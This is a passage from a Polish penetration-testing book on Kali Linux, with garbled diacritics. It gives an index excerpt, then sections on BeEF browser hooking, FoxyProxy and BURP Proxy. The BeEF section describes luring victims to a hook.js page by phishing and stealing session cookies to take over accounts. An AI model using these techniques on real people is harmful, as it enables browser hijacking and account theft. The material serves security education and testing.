sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 9: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

232

systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS

BeEF mdash Browser Exploitation Framework

Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych

Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox

Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux

Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

